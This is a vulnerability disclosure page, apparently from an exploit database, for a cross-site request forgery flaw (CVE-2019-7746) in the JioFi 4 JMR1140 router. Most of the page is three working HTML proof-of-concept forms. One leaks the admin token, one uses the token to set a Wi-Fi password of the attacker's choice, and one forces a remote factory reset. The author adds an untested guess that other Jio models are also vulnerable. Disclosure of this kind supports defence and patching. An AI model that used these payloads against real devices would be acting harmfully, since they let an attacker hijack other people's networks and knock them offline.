Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)
2019-02-13 17:05:06# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746
Description:
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.
POC-
The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router.
1. First get admin tokens
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
<input type="hidden" name="type" value="getuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Example response-
{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}
Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="SetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="hidden" name="ssid" value="JioFi4_08FE5F" />
<input type="hidden" name="mode_802_11" value="11bgn" />
<input type="hidden" name="tx_power" value="HIGH" />
<input type="hidden" name="wmm" value="Enable" />
<input type="hidden" name="wps_enable" value="PushButton" />
<input type="hidden" name="wifi_security" value="WPA2PSK" />
<input type="hidden" name="wpa_encryption_type" value="AES" />
<input type="hidden" name="wpa_security_key" value="Iamhacked" />
<input type="hidden" name="wep_security_key_1" value="0" />
<input type="hidden" name="wep_security_key_2" value="0" />
<input type="hidden" name="wep_security_key_3" value="0" />
<input type="hidden" name="wep_security_key_4" value="0" />
<input type="hidden" name="wep_current_default_key" value="0" />
<input type="hidden" name="channel_mode" value="automatic" />
<input type="hidden" name="channel_selection" value="11" />
<input type="hidden" name="sleep_mode" value="Enable" />
<input type="hidden" name="sleep_mode_timer" value="30" />
<input type="hidden" name="ssid_broadcast" value="Enable" />
<input type="hidden" name="enable_wifi" value="Enable" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Wifi Password changed to Iamhacked
Choice B) Perform Remote Factory Reset
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="type" value="FRST_REAL" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The router reboots to default settings.
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.
Fixes
No fixesIn order to submit a new fix you need to be registered.